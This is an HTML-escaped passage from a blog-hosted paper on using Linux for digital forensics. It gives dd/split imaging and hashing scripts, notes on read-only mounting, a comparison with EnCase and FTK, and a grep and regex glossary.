&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;#!/bin/bash &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; dd if=$1 | split -d -b 700m - image. &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; cat image.* &amp;gt;&amp;gt; $2 &lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This would take a specified device, image it in 700 MB chunks  (unnecessary but helpful for burning to discs), and then concatenates  the chunks into a single full image.LXX  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The following would be a brief continuation of the former, making an  image, hashing the result for verification, and mounting the resultant  image to a folder and doing a grep search on it:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;span style=&quot;color: yellow;&quot;&gt;#!/bin/bash &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; dd if=$1 | split -d -b 700m - image. &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; cat image.* &amp;gt;&amp;gt; $2 &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; #dd if=$1 of=$2 &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; cat image.* | md5sum &amp;gt; $2.split.md5 &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; md5sum $2 &amp;gt; $2.md5 &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; mkdir mounted &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; sudo mount $2 -o loop -oro ./mounted &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; grep -Prl &quot;warez|piracy|torrents?&quot; ./mounted/ &amp;gt; $2.grep.result&lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; foremost -i $2 -o $2.output &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br style=&quot;color: yellow;&quot; /&gt;&lt;span style=&quot;color: yellow;&quot;&gt; nautilus $2.output &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The $1 and $2 signify command arguments.  After doing a chmod on the  script file to allow its execution, typing in something to the effect of  ./script.sh command1 command2 runs the file “script.sh” in the current  directory, with the “command1” and “command2” passed to the $1 and $2 in  the script respectively.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This creates a raw dd image comparable to FTK Imager&amp;amp;#039;s raw  image (the two resultant images can be verified to be the same).  The  image is mounted and then grep is used to search through the mounted  image.  Foremost runs after the grep search, and the folder is opened  via nautilus for each viewing.  Expansions/revisions upon this can and  should be added per case requirements.  Should circumstances necessitate  compression, this can be accomplished with the likes of gzip, bzip2,  tar, or similar utilities.  Using gzip is as simple as “gzip [image  name],” whereafter the image will be named [image name].gz when  possible.LXXI&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;i&gt;&lt;b&gt;Linux as a forensics platform:&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Hopefully by this point it has been shown that many aspects of forensic  investigation can be done via the use of a no cost operating system,  including imaging, file carving and exportation, keyword searching, and  sorting by file types.LXXII  Many versions of Linux can be had for no  monetary cost, and the freedom to tweak and adjust aspects as needed are  of a significant benefit especially in forensic investigations  involving unique circumstances.LXXIII  Proprietary firms that make and  distribute forensic software are swayed principally by monetary concerns  can conceivably leave investigators out to pasture if the  latter&amp;amp;#039;s needs are not matched by the goals of the former.  The  power and control over open-source tools allows for modifications and  advancements beyond the concerns of closed-source software.LXXIV  Brian  Carrier also argued that open source tools more effectively meet the  criteria for forensic evidences&amp;amp;#039; admissibility per the “Daubert  test.”LXXV&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Linux however may have higher barriers to entry than does Windows, in  which case it must be determined whether or not the costs of a windows  system (and the accompanying Windows forensics tools) balance or are  outweighed to the benefits of using Linux.  This entry barrier is solely  on a per-user basis given the preponderance of investigators primarily  dealing with Windows.LXXVI&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;One of the criticisms of Linux involves mounting drives as read only.   On face value, this can be accomplished easily with something such as  the following: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;mount -oro /dev/sdb3 /media/imaged/&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;However, a process called journal recovery with certain file-systems  such as Ext3/4 and others may change the evidence.  There is an option  &amp;amp;#039;noload&amp;amp;#039; or &amp;amp;#039;loop&amp;amp;#039; that supposedly  corrects this issue, but given the ease by which one may neglect to  include it, and the ever-present concern of some unforeseen circumstance  that might cause the kernel to write to the drive, it is prudent to use  a hardware write-blocker.LXXVII LXXVIII&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Another issue involves auto-mounted devices, such as USB drives and  such.  Typically, when these are plugged into most Linux systems, they  are mounted without asking the user.  Doing this with evidentiary media  is a poor forensic practice in most circumstances.  As mentioned, the  best by far is to use a hardware write-blocker, but disabling processes  that automount should work as well.LXXIX LXXX&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;An issue specific to grep is the lack of support for Unicode-16 and  U-32, which shall become an increasingly large obstacle in proportion to  the frequency of such encountered in investigations.LXXXI&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;There are some other criticisms to using Linux for investigations:  Linux can&amp;amp;#039;t see the last sector on a device with an odd number  of sectors.LXXXII  But probably the most salient criticism of using  Linux as the primary forensic medium for most is the higher barrier to  entry given that you must learn a good deal of commands and how to  navigate via a console instead of GUI-based tools.  This is no longer  fully convincing with tools such as Autopsy coming onto the market;  though Autopsy lacks the flair of EnCase and FTK, it does many of the  same things.LXXXIII The detriments need to be fully explored by any  investigator desiring a transition from Windows to Linux forensics  tools—one need be mindful that any different operating system will  present different problems.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Despite these criticisms, benefits of Linux abound.  The first is a  greater familiarity with a different tool set.  Linux is especially  prevalent on high-end systems.  Four-fifths of the world&amp;amp;#039;s  supercomputers run LinuxLXXXIV, and live forensic analysis on one of  these would be the worst possible time to acquaint one&amp;amp;#039;s self  with the basics of grep.  Knowing at least basic knowledge of Linux  lends to a greater degree of competency with non-Windows OS, including  Mac OS X, Solaris, and others.LXXXV LXXXVI LXXXVII&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;It would be remiss to neglect the costs of Linux versus proprietary  alternatives.  Due primarily to the relative easy by which forensics  investigations may be conducted with a license of either EnCase or FTK,  coupled with a demand for forensics investigators that would be  otherwise estranged from the field in lieu of such a productLXXXVIII, a  premium has been (perhaps rightfully so) charged for the use of their  products in the form of hefty licensing fees.  Though this paper only  serves as a sliver of the material needed to match the intricacies of  competing products, if a community effort were to materialize around  forensically-oriented concerns, it is definitely conceivable that EnCase  and FTK would have a competitor selling software at an extremely  attractive price.LXXXIX Need has brought forth such software as GIMP  (free alternative to Photoshop), OpenOffice (alternative to Microsoft  Office), and thousands of others;  analogous forensic software is less a  fantasy than a probable future.XC&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Lastly, it has to be asked whether the field of forensics is benefited  by a pair of relatively monopolistic businesses. Though this is enough  to ensure healthy competition to further improve one product over said  product&amp;amp;#039;s competition, any enthusiastic programmer wishing to  contribute to the effort is denied the opportunity to do so by the very  nature of proprietary code.  The arrangement at present primarily  benefits the producers and not the users of forensic software.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Ultimately, the decision over which of these two competitors is better  is left up to the reader&amp;amp;#039;s discretion.  In the future,  hopefully GNU/Linux will become more a competitor to Windows as a  platform of computer forensic investigation.  Regardless of whether or  not Linux gains significant market share in forensic software,  additional option will increase the pressure to optimize software with  additional features to benefit end-users.&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;i&gt;Grep command glossary:XCI XCII&lt;/i&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;grep : program that prints lines matching a pattern.  Equivalent to grep  -G, for basic regular expressions (i.e. BRE)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Egrep : &amp;amp;#039;extended grep&amp;amp;#039;, equivalent to grep -E&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;grep -P : grep using Perl syntax.  Most uses of grep in this paper use  grep -P.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-r : recursively search through folders.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-i : case insensitivity&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-f : obtain patterns from a specified file (one per line)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-v : select non-matching lines (rarely used in this paper)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-c: output file and &amp;amp;#039;count&amp;amp;#039; the number of occurrences  of the pattern&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-a : treat all files as text.  Use this to find data that may be hidden  in binary files  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-l : print name of file.  Stops after first match.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-m [#]: stop reading a file after a certain number of matches&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-n : Prints out the line number that matches the pattern&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-A [#]: print # lines after a match&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-B [#]: print # lines before a match&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;--exclude-dir=[DIRPATH]: exclude a directory.  Useful for avoiding  recursive loops.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;-w : print all lines containing pattern as a word (the pattern  &amp;amp;#039;eye&amp;amp;#039; would match &amp;amp;#039;eye&amp;amp;#039; but not  &amp;amp;#039;eyelid&amp;amp;#039;)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;u&gt;&lt;i&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;u&gt;&lt;i&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;u&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Notes on Regex Symbols and Glossary: XCIII&lt;/span&gt;&lt;/i&gt;&lt;/u&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;Global:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt; this term refers to an option by which multiple matches can be  found in a given string/file.  The tools mentioned in this guide are  global by default.  The opposite of this would stop after the first  match.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Case sensitivity:&lt;/span&gt;&lt;/b&gt; determines whether or not a pattern such as  &amp;amp;#039;google&amp;amp;#039; is matched in the data &quot;gOOgle&quot; or &quot;GOOGLE&quot;  or not.  With grep, the -i switch can enable case insensitivity, in  which case the aforementioned example would match. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;Extended: &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;This is somewhat an ambiguous term.  It can refer to ERE,  extended regular expressions, as in POSIX ERE, or more generally, to a  feature that ignores white space in the searched data. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: lime; font-size: large;&quot;&gt;&lt;b&gt;Dotall: &lt;/b&gt;&lt;/span&gt;this determines whether the wildcard &amp;amp;#039;.&amp;amp;#039; will  match newlines or not.  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Multiline: most often pertinent in the scripting languages&amp;amp;#039;  utilization of regular expressions, this determines the functionality of  the anchors ^ and $, whether they are matched only by the start of the  string and its end, or whether newlines will cause said anchors to match  the start and end of each respective line.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;Character classes:&lt;/span&gt; &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;. : matches any character &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\w : matches any word character &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\W : negation of \w &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\d : matches any digit &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\D : negation of \d &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\s : matches a whitespace character &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\S : negation of \S, any non-whitespace character &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Character sets: &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;[\WxZ] : braces act as an OR statement, in which anything inside may  occur for a single character.  In said example, either \W, x, or z may  be matched.  May also be a range, such as [a-z], or a set of ranges,  [a-z0-4] &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;[^abc] : matches a character that is not a, b, or c. &lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Special characters: &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\t : tab &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\r : carriage return &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\n : new line/line break &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\xAB : hex character (e.g. \x20 for a space, \x0A for a new line) &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Characters which typically need to be escaped for literal match: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\, ., +, *, ?, ^, $, [, ], |, {, }, /, &amp;amp;#039;, #, (, ) &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Anchors: &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\b : matches a word boundary, typically white space before and after  words, or the start of a line &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;\B : negation of \b &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;^ : matches the start of a string* &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;$ : matches the end of a string* &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;*: discussed in this paper what precisely this entails &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Lookaround: &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;abc(?=afas): Lookahead. This would look for &quot;afas&quot; after the pattern  &quot;abc.&quot; &quot;abc&quot; would not be included in the result. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;abc(?!afas): Negated lookahead.  E.g. if afas is directly after abc,  discard the result. XCIV&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;(?&amp;lt;=afas)abc: Lookbehind.  Does the same as lookahead but looks  before a given pattern.  An example of this would be &quot;afasabc&quot;.  The  lookaround pattern is not included. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;(?&amp;lt;!afas)abc: Negated lookbehind.  If &amp;amp;#039;afas&amp;amp;#039;  precedes &amp;amp;#039;abc,&amp;amp;#039; discard the result. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Quantifiers: &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;? : makes the preceding character optional.  Works on any token. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;* : matches zero or more of the preceding token. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;*?: matches zero or more.  &quot;Lazy&quot; match, matches as few characters as  possible &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;+ : Matches 1 or more of preceding token.  Greedy, will match as much as  possible. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;+? : Matches zero or more.  Alternative form of *?. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;{3} : match preceding token exactly three times. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;{10,12} : match preceding token 10-12 times. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;{3-7}? : Match preceding 3-7 times.  Lazy match, will match as little as  possible. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Grouping: &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;(cat) : groups tokens together in a capture group. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;(?:cat): groups tokens together, no capture group. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Capturing groups are a way of storing matched substrings that can be  referenced later.  These are mostly useful for scripting (e.g. with sed  and other applications)—less so for searching a hard drive.XCV&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Alternation: &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;| : the &amp;amp;#039;pipe&amp;amp;#039; character.  Allows for the matching of  groups.  cat|dog matches &amp;amp;#039;cat&amp;amp;#039; or  &amp;amp;#039;dog&amp;amp;#039; literally.  To apply this within a larger  expression, quotes may be used to separate groups.  To match  &amp;amp;#039;catog&amp;amp;#039; or &amp;amp;#039;cadog&amp;amp;#039;, the pattern  ca(t|d)og would suffice. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;Endnotes/Citations:&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;I &lt;span style=&quot;color: yellow;&quot;&gt;http://en.wikipedia.org/wiki/Pattern_matching&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;II &lt;span style=&quot;color: yellow;&quot;&gt;http://en.wikipedia.org/wiki/Regular_expressions&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;III &lt;span style=&quot;color: yellow;&quot;&gt;http://www.catb.org/~esr/jargon/html/G/grep.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;IV &lt;span style=&quot;color: yellow;&quot;&gt;http://www.regular-expressions.info/refflavors.html&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
